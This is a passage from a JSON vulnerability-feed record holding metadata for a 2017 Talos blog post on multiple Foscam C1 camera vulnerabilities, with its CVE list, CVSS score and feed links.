/>42431-42437<br />43005<br />43061<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=NJYd2ILj-uQ:uW9J5dOrlWY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/NJYd2ILj-uQ\" height=\"1\" width=\"1\" alt=\"\"/>", "reporter": "noreply@blogger.com (Nick Biasini)", "published": "2017-06-19T08:45:00", "title": "Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "talosblog", "bulletinFamily": "blog", "cvelist": ["CVE-2016-8731", "CVE-2017-2805", "CVE-2017-2827", "CVE-2017-2828", "CVE-2017-2829", "CVE-2017-2830", "CVE-2017-2831", "CVE-2017-2832", "CVE-2017-2833", "CVE-2017-2841", "CVE-2017-2842", "CVE-2017-2843", "CVE-2017-2844", "CVE-2017-2845", "CVE-2017-2846", "CVE-2017-2847", "CVE-2017-2848", "CVE-2017-2849", "CVE-2017-2850", "CVE-2017-2851", "CVE-2017-3844"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2017-06-19T16:16:13", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/NJYd2ILj-uQ/foscam-vuln-details.html", "id": "TALOSBLOG:0E7D49F78E04B2B1571CBB4FAAC8B2D3", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
